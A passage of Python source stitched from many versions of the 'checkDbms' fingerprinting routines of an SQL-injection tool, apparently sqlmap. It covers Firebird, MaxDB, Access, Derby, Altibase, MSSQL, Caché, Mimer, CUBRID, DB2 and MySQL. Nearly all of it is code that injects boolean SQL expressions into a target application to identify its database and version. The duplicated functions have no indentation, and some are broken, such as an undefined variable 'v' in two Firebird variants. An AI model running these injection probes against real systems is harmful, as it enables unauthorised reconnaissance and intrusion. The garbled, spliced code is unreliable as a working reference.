setDbms(DBMS.FIREBIRD)
self.getBanner()
if not conf.extensiveFp:
return True
logMsg = "testing Firebird"
logger.info(logMsg)
randInt = randomInt()
payload = agent.fullPayload("AND EXISTS(SELECT * FROM RDB$DATABASE WHERE %d=%d)" % (randInt, randInt))
result = Request.queryPage(payload)
if result:
logMsg = "confirming Firebird"
logger.info(logMsg)
payload = agent.fullPayload("AND EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)")
result = Request.queryPage(payload)
if not result:
warnMsg = "the back-end DBMS is not Firebird"
logger.warn(warnMsg)
return False
setDbms(DBMS.FIREBIRD)
self.getBanner()
if not conf.extensiveFp:
return True
kb.dbmsVersion = [self.__sysTablesCheck()]
return True
else:
warnMsg = "the back-end DBMS is not Firebird"
logger.warn(warnMsg)
return False
def checkDbms(self):
if conf.dbms in MAXDB_ALIASES:
setDbms(DBMS.MAXDB)
self.getBanner()
if not conf.extensiveFp:
return True
logMsg = "testing SAP MaxDB"
logger.info(logMsg)
randInt = randomInt()
payload = agent.fullPayload("AND NOROUND(%d)=%d" % (randInt, randInt))
result = Request.queryPage(payload)
if result:
logMsg = "confirming SAP MaxDB"
logger.info(logMsg)
payload = agent.fullPayload("AND MAPCHAR(NULL,1,DEFAULTMAP) IS NULL")
result = Request.queryPage(payload)
if not result:
warnMsg = "the back-end DBMS is not SAP MaxDB"
logger.warn(warnMsg)
return False
setDbms(DBMS.MAXDB)
self.getBanner()
if not conf.extensiveFp:
return True
kb.dbmsVersion = None
return True
else:
warnMsg = "the back-end DBMS is not SAP MaxDB"
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and (Backend.isDbmsWithin(ACCESS_ALIASES) or
(conf.dbms
or "").lower() in ACCESS_ALIASES):
setDbms(DBMS.ACCESS)
return True
infoMsg = "testing %s" % DBMS.ACCESS
logger.info(infoMsg)
result = inject.checkBooleanExpression("VAL(CVAR(1))=1")
if result:
infoMsg = "confirming %s" % DBMS.ACCESS
logger.info(infoMsg)
result = inject.checkBooleanExpression(
"IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.ACCESS
logger.warn(warnMsg)
return False
setDbms(DBMS.ACCESS)
if not conf.extensiveFp:
return True
infoMsg = "actively fingerprinting %s" % DBMS.ACCESS
logger.info(infoMsg)
version = self._sysTablesCheck()
if version is not None:
Backend.setVersion(version)
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.ACCESS
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and (Backend.isDbmsWithin(ACCESS_ALIASES) or (conf.dbms or "").lower() in ACCESS_ALIASES):
setDbms(DBMS.ACCESS)
return True
infoMsg = "testing %s" % DBMS.ACCESS
logger.info(infoMsg)
result = inject.checkBooleanExpression("VAL(CVAR(1))=1")
if result:
infoMsg = "confirming %s" % DBMS.ACCESS
logger.info(infoMsg)
result = inject.checkBooleanExpression("IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.ACCESS
logger.warn(warnMsg)
return False
setDbms(DBMS.ACCESS)
if not conf.extensiveFp:
return True
infoMsg = "actively fingerprinting %s" % DBMS.ACCESS
logger.info(infoMsg)
version = self._sysTablesCheck()
if version is not None:
Backend.setVersion(version)
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.ACCESS
logger.warn(warnMsg)
return False
def checkDbms(self):
if conf.dbms in ACCESS_ALIASES:
setDbms(DBMS.ACCESS)
if not conf.extensiveFp:
return True
logMsg = "testing Microsoft Access"
logger.info(logMsg)
payload = agent.fullPayload("AND VAL(CVAR(1))=1")
result = Request.queryPage(payload)
if result:
logMsg = "confirming Microsoft Access"
logger.info(logMsg)
payload = agent.fullPayload("AND IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0")
result = Request.queryPage(payload)
if not result:
warnMsg = "the back-end DBMS is not Microsoft Access"
logger.warn(warnMsg)
return False
setDbms("Microsoft Access")
if not conf.extensiveFp:
return True
kb.dbmsVersion = [self.__sysTablesCheck()]
return True
else:
warnMsg = "the back-end DBMS is not Microsoft Access"
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and Backend.isDbmsWithin(DERBY_ALIASES):
setDbms(DBMS.DERBY)
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.DERBY
logger.info(infoMsg)
result = inject.checkBooleanExpression(
"[RANDNUM]=(SELECT [RANDNUM] FROM SYSIBM.SYSDUMMY1 {LIMIT 1 OFFSET 0})"
)
if result:
infoMsg = "confirming %s" % DBMS.DERBY
logger.info(infoMsg)
result = inject.checkBooleanExpression(
"(SELECT CURRENT SCHEMA FROM SYSIBM.SYSDUMMY1) IS NOT NULL")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.DERBY
logger.warn(warnMsg)
return False
setDbms(DBMS.DERBY)
self.getBanner()
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.DERBY
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and Backend.isDbmsWithin(ALTIBASE_ALIASES):
setDbms(DBMS.ALTIBASE)
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.ALTIBASE
logger.info(infoMsg)
# Reference: http://support.altibase.com/fileDownload.do?gubun=admin&no=228
result = inject.checkBooleanExpression("CHOSUNG(NULL) IS NULL")
if result:
infoMsg = "confirming %s" % DBMS.ALTIBASE
logger.info(infoMsg)
result = inject.checkBooleanExpression(
"TDESENCRYPT(NULL,NULL) IS NULL")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.ALTIBASE
logger.warn(warnMsg)
return False
setDbms(DBMS.ALTIBASE)
self.getBanner()
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.ALTIBASE
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and Backend.isDbmsWithin(MSSQL_ALIASES):
setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion()))
self.getBanner()
Backend.setOs(OS.WINDOWS)
return True
infoMsg = "testing %s" % DBMS.MSSQL
logger.info(infoMsg)
# NOTE: SELECT LEN(@@VERSION)=LEN(@@VERSION) FROM DUAL does not
# work connecting directly to the Microsoft SQL Server database
if conf.direct:
result = True
else:
result = inject.checkBooleanExpression(
"UNICODE(SQUARE(NULL)) IS NULL")
if result:
infoMsg = "confirming %s" % DBMS.MSSQL
logger.info(infoMsg)
for version, check in (
("2019", "CHARINDEX('15.0.',@@VERSION)>0"),
("Azure", "@@VERSION LIKE '%Azure%'"),
("2017", "TRIM(NULL) IS NULL"),
("2016", "ISJSON(NULL) IS NULL"),
("2014", "CHARINDEX('12.0.',@@VERSION)>0"),
("2012", "CONCAT(NULL,NULL)=CONCAT(NULL,NULL)"),
("2008", "SYSDATETIME()=SYSDATETIME()"),
("2005", "XACT_STATE()=XACT_STATE()"),
("2000", "HOST_NAME()=HOST_NAME()"),
):
result = inject.checkBooleanExpression(check)
if result:
Backend.setVersion(version)
break
if Backend.getVersion():
setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion()))
else:
setDbms(DBMS.MSSQL)
self.getBanner()
Backend.setOs(OS.WINDOWS)
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.MSSQL
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and Backend.isDbmsWithin(CACHE_ALIASES):
setDbms(DBMS.CACHE)
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.CACHE
logger.info(infoMsg)
result = inject.checkBooleanExpression("$LISTLENGTH(NULL) IS NULL")
if result:
infoMsg = "confirming %s" % DBMS.CACHE
logger.info(infoMsg)
result = inject.checkBooleanExpression(
"%EXTERNAL %INTERNAL NULL IS NULL")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.CACHE
logger.warn(warnMsg)
return False
setDbms(DBMS.CACHE)
self.getBanner()
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.CACHE
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and (Backend.isDbmsWithin(FIREBIRD_ALIASES) \
or conf.dbms in FIREBIRD_ALIASES) and Backend.getVersion() and \
Backend.getVersion() != UNKNOWN_DBMS_VERSION:
v = Backend.getVersion().replace(">", "")
v = v.replace("=", "")
v = v.replace(" ", "")
Backend.setVersion(v)
setDbms("%s %s" % (DBMS.FIREBIRD, Backend.getVersion()))
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.FIREBIRD
logger.info(infoMsg)
randInt = randomInt()
result = inject.checkBooleanExpression(
"EXISTS(SELECT * FROM RDB$DATABASE WHERE %d=%d)" %
(randInt, randInt))
if result:
infoMsg = "confirming %s" % DBMS.FIREBIRD
logger.info(infoMsg)
result = inject.checkBooleanExpression(
"EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.FIREBIRD
logger.warn(warnMsg)
return False
setDbms(DBMS.FIREBIRD)
infoMsg = "actively fingerprinting %s" % DBMS.FIREBIRD
logger.info(infoMsg)
version = self._sysTablesCheck()
if version is not None:
Backend.setVersion(version)
setDbms("%s %s" % (DBMS.FIREBIRD, version))
self.getBanner()
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.FIREBIRD
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and Backend.isDbmsWithin(MIMERSQL_ALIASES):
setDbms(DBMS.MIMERSQL)
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.MIMERSQL
logger.info(infoMsg)
result = inject.checkBooleanExpression("IRAND()>=0")
if result:
infoMsg = "confirming %s" % DBMS.MIMERSQL
logger.info(infoMsg)
result = inject.checkBooleanExpression(
"PASTE('[RANDSTR1]',0,0,'[RANDSTR2]')='[RANDSTR2][RANDSTR1]'")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.MIMERSQL
logger.warn(warnMsg)
return False
setDbms(DBMS.MIMERSQL)
self.getBanner()
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.MIMERSQL
logger.warn(warnMsg)
return False
def checkDbms(self):
if (
not conf.extensiveFp
and (Backend.isDbmsWithin(FIREBIRD_ALIASES) or conf.dbms in FIREBIRD_ALIASES)
and Backend.getVersion()
and Backend.getVersion() != UNKNOWN_DBMS_VERSION
):
v = Backend.getVersion().replace(">", "")
v = v.replace("=", "")
v = v.replace(" ", "")
Backend.setVersion(v)
setDbms("%s %s" % (DBMS.FIREBIRD, Backend.getVersion()))
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.FIREBIRD
logger.info(infoMsg)
randInt = randomInt()
result = inject.checkBooleanExpression("EXISTS(SELECT * FROM RDB$DATABASE WHERE %d=%d)" % (randInt, randInt))
if result:
infoMsg = "confirming %s" % DBMS.FIREBIRD
logger.info(infoMsg)
result = inject.checkBooleanExpression("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.FIREBIRD
logger.warn(warnMsg)
return False
setDbms(DBMS.FIREBIRD)
infoMsg = "actively fingerprinting %s" % DBMS.FIREBIRD
logger.info(infoMsg)
version = self._sysTablesCheck()
if version is not None:
Backend.setVersion(version)
setDbms("%s %s" % (DBMS.FIREBIRD, version))
self.getBanner()
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.FIREBIRD
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and Backend.isDbmsWithin(CUBRID_ALIASES):
setDbms(DBMS.CUBRID)
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.CUBRID
logger.info(infoMsg)
result = inject.checkBooleanExpression(
"{} SUBSETEQ (CAST ({} AS SET))")
if result:
infoMsg = "confirming %s" % DBMS.CUBRID
logger.info(infoMsg)
result = inject.checkBooleanExpression("DRAND()<2")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.CUBRID
logger.warn(warnMsg)
return False
setDbms(DBMS.CUBRID)
self.getBanner()
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.CUBRID
logger.warn(warnMsg)
return False
def checkDbms(self):
if (
not conf.extensiveFp
and (Backend.isDbmsWithin(MSSQL_ALIASES) or conf.dbms in MSSQL_ALIASES)
and Backend.getVersion()
and Backend.getVersion().isdigit()
):
setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion()))
self.getBanner()
Backend.setOs(OS.WINDOWS)
return True
infoMsg = "testing %s" % DBMS.MSSQL
logger.info(infoMsg)
# NOTE: SELECT LEN(@@VERSION)=LEN(@@VERSION) FROM DUAL does not
# work connecting directly to the Microsoft SQL Server database
if conf.direct:
result = True
else:
result = inject.checkBooleanExpression("SQUARE([RANDNUM])=SQUARE([RANDNUM])")
if result:
infoMsg = "confirming %s" % DBMS.MSSQL
logger.info(infoMsg)
for version, check in (
("2000", "HOST_NAME()=HOST_NAME()"),
("2005", "XACT_STATE()=XACT_STATE()"),
("2008", "SYSDATETIME()=SYSDATETIME()"),
("2012", "CONCAT(NULL,NULL)=CONCAT(NULL,NULL)"),
):
result = inject.checkBooleanExpression(check)
if result:
Backend.setVersion(version)
if Backend.getVersion():
setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion()))
else:
setDbms(DBMS.MSSQL)
self.getBanner()
Backend.setOs(OS.WINDOWS)
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.MSSQL
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and (Backend.isDbmsWithin(MSSQL_ALIASES) \
or (conf.dbms or "").lower() in MSSQL_ALIASES) and Backend.getVersion() and \
Backend.getVersion().isdigit():
setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion()))
self.getBanner()
Backend.setOs(OS.WINDOWS)
return True
infoMsg = "testing %s" % DBMS.MSSQL
logger.info(infoMsg)
# NOTE: SELECT LEN(@@VERSION)=LEN(@@VERSION) FROM DUAL does not
# work connecting directly to the Microsoft SQL Server database
if conf.direct:
result = True
else:
result = inject.checkBooleanExpression(
"SQUARE([RANDNUM])=SQUARE([RANDNUM])")
if result:
infoMsg = "confirming %s" % DBMS.MSSQL
logger.info(infoMsg)
for version, check in (("2000", "HOST_NAME()=HOST_NAME()"), \
("2005", "XACT_STATE()=XACT_STATE()"), \
("2008", "SYSDATETIME()=SYSDATETIME()"), \
("2012", "CONCAT(NULL,NULL)=CONCAT(NULL,NULL)"), \
("2014", "CHARINDEX('12.0.2000',@@version)>0"), \
("2016", "ISJSON(NULL) IS NULL")):
result = inject.checkBooleanExpression(check)
if result:
Backend.setVersion(version)
if Backend.getVersion():
setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion()))
else:
setDbms(DBMS.MSSQL)
self.getBanner()
Backend.setOs(OS.WINDOWS)
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.MSSQL
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and (Backend.isDbmsWithin(MSSQL_ALIASES) \
or conf.dbms in MSSQL_ALIASES) and Backend.getVersion() and \
Backend.getVersion().isdigit():
setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion()))
self.getBanner()
Backend.setOs(OS.WINDOWS)
return True
infoMsg = "testing %s" % DBMS.MSSQL
logger.info(infoMsg)
# NOTE: SELECT LEN(@@VERSION)=LEN(@@VERSION) FROM DUAL does not
# work connecting directly to the Microsoft SQL Server database
if conf.direct:
result = True
else:
randInt = randomInt()
result = inject.checkBooleanExpression(
"BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" % (randInt, randInt))
if result:
infoMsg = "confirming %s" % DBMS.MSSQL
logger.info(infoMsg)
for version, check in (("2000", "HOST_NAME()=HOST_NAME()"), \
("2005", "XACT_STATE()=XACT_STATE()"), \
("2008", "SYSDATETIME()=SYSDATETIME()")):
result = inject.checkBooleanExpression(check)
if result:
Backend.setVersion(version)
if Backend.getVersion():
setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion()))
else:
setDbms(DBMS.MSSQL)
self.getBanner()
Backend.setOs(OS.WINDOWS)
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.MSSQL
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and (Backend.isDbmsWithin(MSSQL_ALIASES) \
or conf.dbms in MSSQL_ALIASES) and Backend.getVersion() and \
Backend.getVersion().isdigit():
setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion()))
self.getBanner()
Backend.setOs(OS.WINDOWS)
return True
infoMsg = "testing %s" % DBMS.MSSQL
logger.info(infoMsg)
# NOTE: SELECT LEN(@@VERSION)=LEN(@@VERSION) FROM DUAL does not
# work connecting directly to the Microsoft SQL Server database
if conf.direct:
result = True
else:
randInt = randomInt()
result = inject.checkBooleanExpression("BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" % (randInt, randInt))
if result:
infoMsg = "confirming %s" % DBMS.MSSQL
logger.info(infoMsg)
for version, check in [ ("2000", "HOST_NAME()=HOST_NAME()"), \
("2005", "XACT_STATE()=XACT_STATE()"), \
("2008", "SYSDATETIME()=SYSDATETIME()") ]:
result = inject.checkBooleanExpression(check)
if result:
Backend.setVersion(version)
if Backend.getVersion():
setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion()))
else:
setDbms(DBMS.MSSQL)
self.getBanner()
Backend.setOs(OS.WINDOWS)
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.MSSQL
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and (Backend.isDbmsWithin(FIREBIRD_ALIASES) \
or (conf.dbms or "").lower() in FIREBIRD_ALIASES) and Backend.getVersion() and \
Backend.getVersion() != UNKNOWN_DBMS_VERSION:
Backend.setVersion(v)
setDbms("%s %s" % (DBMS.FIREBIRD, Backend.getVersion()))
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.FIREBIRD
logger.info(infoMsg)
result = inject.checkBooleanExpression(
"(SELECT COUNT(*) FROM RDB$DATABASE WHERE [RANDNUM]=[RANDNUM])>0")
if result:
infoMsg = "confirming %s" % DBMS.FIREBIRD
logger.info(infoMsg)
result = inject.checkBooleanExpression(
"EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.FIREBIRD
logger.warn(warnMsg)
return False
setDbms(DBMS.FIREBIRD)
infoMsg = "actively fingerprinting %s" % DBMS.FIREBIRD
logger.info(infoMsg)
version = self._sysTablesCheck()
if version is not None:
Backend.setVersion(version)
setDbms("%s %s" % (DBMS.FIREBIRD, version))
self.getBanner()
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.FIREBIRD
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and (Backend.isDbmsWithin(FIREBIRD_ALIASES) \
or (conf.dbms or "").lower() in FIREBIRD_ALIASES) and Backend.getVersion() and \
Backend.getVersion() != UNKNOWN_DBMS_VERSION:
Backend.setVersion(v)
setDbms("%s %s" % (DBMS.FIREBIRD, Backend.getVersion()))
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.FIREBIRD
logger.info(infoMsg)
result = inject.checkBooleanExpression("(SELECT COUNT(*) FROM RDB$DATABASE WHERE [RANDNUM]=[RANDNUM])>0")
if result:
infoMsg = "confirming %s" % DBMS.FIREBIRD
logger.info(infoMsg)
result = inject.checkBooleanExpression("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.FIREBIRD
logger.warn(warnMsg)
return False
setDbms(DBMS.FIREBIRD)
infoMsg = "actively fingerprinting %s" % DBMS.FIREBIRD
logger.info(infoMsg)
version = self._sysTablesCheck()
if version is not None:
Backend.setVersion(version)
setDbms("%s %s" % (DBMS.FIREBIRD, version))
self.getBanner()
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.FIREBIRD
logger.warn(warnMsg)
return False
def checkDbms(self):
if conf.dbms in MSSQL_ALIASES and kb.dbmsVersion and kb.dbmsVersion[
0].isdigit():
setDbms("Microsoft SQL Server %s" % kb.dbmsVersion[0])
self.getPrematureBanner("@@VERSION")
if not conf.extensiveFp:
return True
logMsg = "testing Microsoft SQL Server"
logger.info(logMsg)
randInt = str(randomInt(1))
query = "LTRIM(STR(LEN(%s)))" % randInt
if inject.getValue(query) == "1":
query = "SELECT SUBSTRING((@@VERSION), 25, 1)"
version = inject.getValue(query)
if version == "8":
kb.dbmsVersion = ["2008"]
elif version == "5":
kb.dbmsVersion = ["2005"]
elif version == "0":
kb.dbmsVersion = ["2000"]
if kb.dbmsVersion:
setDbms("Microsoft SQL Server %s" % kb.dbmsVersion[0])
else:
setDbms("Microsoft SQL Server")
self.getPrematureBanner("@@VERSION")
return True
else:
warnMsg = "the back-end DMBS is not Microsoft SQL Server"
logger.warn(warnMsg)
return False
def checkDbms(self):
if conf.dbms in MSSQL_ALIASES and kb.dbmsVersion and kb.dbmsVersion[0].isdigit():
setDbms("Microsoft SQL Server %s" % kb.dbmsVersion[0])
self.getPrematureBanner("@@VERSION")
if not conf.extensiveFp:
return True
logMsg = "testing Microsoft SQL Server"
logger.info(logMsg)
randInt = str(randomInt(1))
query = "LTRIM(STR(LEN(%s)))" % randInt
if inject.getValue(query) == "1":
query = "SELECT SUBSTRING((@@VERSION), 25, 1)"
version = inject.getValue(query)
if version == "8":
kb.dbmsVersion = ["2008"]
elif version == "5":
kb.dbmsVersion = ["2005"]
elif version == "0":
kb.dbmsVersion = ["2000"]
if kb.dbmsVersion:
setDbms("Microsoft SQL Server %s" % kb.dbmsVersion[0])
else:
setDbms("Microsoft SQL Server")
self.getPrematureBanner("@@VERSION")
return True
else:
warnMsg = "the back-end DMBS is not Microsoft SQL Server"
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and Backend.isDbmsWithin(DB2_ALIASES):
setDbms(DBMS.DB2)
return True
logMsg = "testing %s" % DBMS.DB2
logger.info(logMsg)
result = inject.checkBooleanExpression(
"[RANDNUM]=(SELECT [RANDNUM] FROM SYSIBM.SYSDUMMY1)")
if result:
logMsg = "confirming %s" % DBMS.DB2
logger.info(logMsg)
result = inject.checkBooleanExpression(
"JULIAN_DAY(CURRENT DATE) IS NOT NULL")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.DB2
logger.warn(warnMsg)
return False
version = self._versionCheck()
if version:
Backend.setVersion(version)
setDbms("%s %s" % (DBMS.DB2, Backend.getVersion()))
else:
setDbms(DBMS.DB2)
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.DB2
logger.warn(warnMsg)
return False
def checkDbms(self):
"""
References for fingerprint:
* http://dev.mysql.com/doc/refman/5.0/en/news-5-0-x.html (up to 5.0.89)
* http://dev.mysql.com/doc/refman/5.1/en/news-5-1-x.html (up to 5.1.42)
* http://dev.mysql.com/doc/refman/5.4/en/news-5-4-x.html (up to 5.4.4)
* http://dev.mysql.com/doc/refman/5.5/en/news-5-5-x.html (up to 5.5.0)
* http://dev.mysql.com/doc/refman/6.0/en/news-6-0-x.html (manual has been withdrawn)
"""
if not conf.extensiveFp and Backend.isDbmsWithin(MYSQL_ALIASES):
setDbms("%s %s" % (DBMS.MYSQL, Backend.getVersion()))
if Backend.isVersionGreaterOrEqualThan("5"):
kb.data.has_information_schema = True
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.MYSQL
logger.info(infoMsg)
result = inject.checkBooleanExpression("QUARTER(NULL) IS NULL")
if result:
infoMsg = "confirming %s" % DBMS.MYSQL
logger.info(infoMsg)
result = inject.checkBooleanExpression("SESSION_USER() LIKE USER()")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.MYSQL
logger.warn(warnMsg)
return False
if hashDBRetrieve(HASHDB_KEYS.DBMS_FORK) is None:
hashDBWrite(HASHDB_KEYS.DBMS_FORK, inject.checkBooleanExpression("VERSION() LIKE '%MariaDB%'") and "MariaDB" or "")
# reading information_schema on some platforms is causing annoying timeout exits
# Reference: http://bugs.mysql.com/bug.php?id=15855
# Determine if it is MySQL >= 5.0.0
if inject.checkBooleanExpression("ISNULL(TIMESTAMPADD(MINUTE,[RANDNUM],NULL))"):
kb.data.has_information_schema = True
Backend.setVersion(">= 5.0.0")
setDbms("%s 5" % DBMS.MYSQL)
self.getBanner()
if not conf.extensiveFp:
return True
infoMsg = "actively fingerprinting %s" % DBMS.MYSQL
logger.info(infoMsg)
# Check if it is MySQL >= 5.5.0
if inject.checkBooleanExpression("TO_SECONDS(950501)>0"):
Backend.setVersion(">= 5.5.0")
# Check if it is MySQL >= 5.1.2 and < 5.5.0
elif inject.checkBooleanExpression("@@table_open_cache=@@table_open_cache"):
if inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.GLOBAL_STATUS LIMIT 0, 1)"):
Backend.setVersionList([">= 5.1.12", "< 5.5.0"])
elif inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.PROCESSLIST LIMIT 0, 1)"):
Backend.setVersionList([">= 5.1.7", "< 5.1.12"])
elif inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.PARTITIONS LIMIT 0, 1)"):
Backend.setVersion("= 5.1.6")
elif inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.PLUGINS LIMIT 0, 1)"):
Backend.setVersionList([">= 5.1.5", "< 5.1.6"])
else:
Backend.setVersionList([">= 5.1.2", "< 5.1.5"])
# Check if it is MySQL >= 5.0.0 and < 5.1.2
elif inject.checkBooleanExpression("@@hostname=@@hostname"):
Backend.setVersionList([">= 5.0.38", "< 5.1.2"])
elif inject.checkBooleanExpression("@@character_set_filesystem=@@character_set_filesystem"):
Backend.setVersionList([">= 5.0.19", "< 5.0.38"])
elif not inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM DUAL WHERE [RANDNUM1]!=[RANDNUM2])"):
Backend.setVersionList([">= 5.0.11", "< 5.0.19"])
elif inject.checkBooleanExpression("@@div_precision_increment=@@div_precision_increment"):
Backend.setVersionList([">= 5.0.6", "< 5.0.11"])
elif inject.checkBooleanExpression("@@automatic_sp_privileges=@@automatic_sp_privileges"):
Backend.setVersionList([">= 5.0.3", "< 5.0.6"])
else:
Backend.setVersionList([">= 5.0.0", "< 5.0.3"])
elif inject.checkBooleanExpression("DATABASE() LIKE SCHEMA()"):
Backend.setVersion(">= 5.0.2")
setDbms("%s 5" % DBMS.MYSQL)
self.getBanner()
elif inject.checkBooleanExpression("STRCMP(LOWER(CURRENT_USER()), UPPER(CURRENT_USER()))=0"):
Backend.setVersion("< 5.0.0")
setDbms("%s 4" % DBMS.MYSQL)
self.getBanner()
if not conf.extensiveFp:
return True
# Check which version of MySQL < 5.0.0 it is
if inject.checkBooleanExpression("3=(SELECT COERCIBILITY(USER()))"):
Backend.setVersionList([">= 4.1.11", "< 5.0.0"])
elif inject.checkBooleanExpression("2=(SELECT COERCIBILITY(USER()))"):
Backend.setVersionList([">= 4.1.1", "< 4.1.11"])
elif inject.checkBooleanExpression("CURRENT_USER()=CURRENT_USER()"):
Backend.setVersionList([">= 4.0.6", "< 4.1.1"])
if inject.checkBooleanExpression("'utf8'=(SELECT CHARSET(CURRENT_USER()))"):
Backend.setVersion("= 4.1.0")
else:
Backend.setVersionList([">= 4.0.6", "< 4.1.0"])
else:
Backend.setVersionList([">= 4.0.0", "< 4.0.6"])
else:
Backend.setVersion("< 4.0.0")
setDbms("%s 3" % DBMS.MYSQL)
self.getBanner()
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.MYSQL
logger.warn(warnMsg)
return False
def checkDbms(self):
"""
References for fingerprint:
* http://dev.mysql.com/doc/refman/5.0/en/news-5-0-x.html (up to 5.0.89)
* http://dev.mysql.com/doc/refman/5.1/en/news-5-1-x.html (up to 5.1.42)
* http://dev.mysql.com/doc/refman/5.4/en/news-5-4-x.html (up to 5.4.4)
* http://dev.mysql.com/doc/refman/5.5/en/news-5-5-x.html (up to 5.5.0)
* http://dev.mysql.com/doc/refman/6.0/en/news-6-0-x.html (manual has been withdrawn)
"""
if not conf.extensiveFp and (Backend.isDbmsWithin(MYSQL_ALIASES) \
or conf.dbms in MYSQL_ALIASES) and Backend.getVersion() and \
Backend.getVersion() != UNKNOWN_DBMS_VERSION:
v = Backend.getVersion().replace(">", "")
v = v.replace("=", "")
v = v.replace(" ", "")
Backend.setVersion(v)
setDbms("%s %s" % (DBMS.MYSQL, Backend.getVersion()))
if Backend.isVersionGreaterOrEqualThan("5"):
kb.data.has_information_schema = True
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.MYSQL
logger.info(infoMsg)
result = inject.checkBooleanExpression("QUARTER(NULL) IS NULL")
if result:
infoMsg = "confirming %s" % DBMS.MYSQL
logger.info(infoMsg)
result = inject.checkBooleanExpression("USER() LIKE USER()")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.MYSQL
logger.warn(warnMsg)
return False
# reading information_schema on some platforms is causing annoying timeout exits
# Reference: http://bugs.mysql.com/bug.php?id=15855
# Determine if it is MySQL >= 5.0.0
if inject.checkBooleanExpression(
"ISNULL(TIMESTAMPADD(MINUTE,[RANDNUM],0))"):
kb.data.has_information_schema = True
Backend.setVersion(">= 5.0.0")
setDbms("%s 5" % DBMS.MYSQL)
self.getBanner()
if not conf.extensiveFp:
return True
infoMsg = "actively fingerprinting %s" % DBMS.MYSQL
logger.info(infoMsg)
# Check if it is MySQL >= 5.5.0
if inject.checkBooleanExpression("TO_SECONDS(950501)>0"):
Backend.setVersion(">= 5.5.0")
# Check if it is MySQL >= 5.1.2 and < 5.5.0
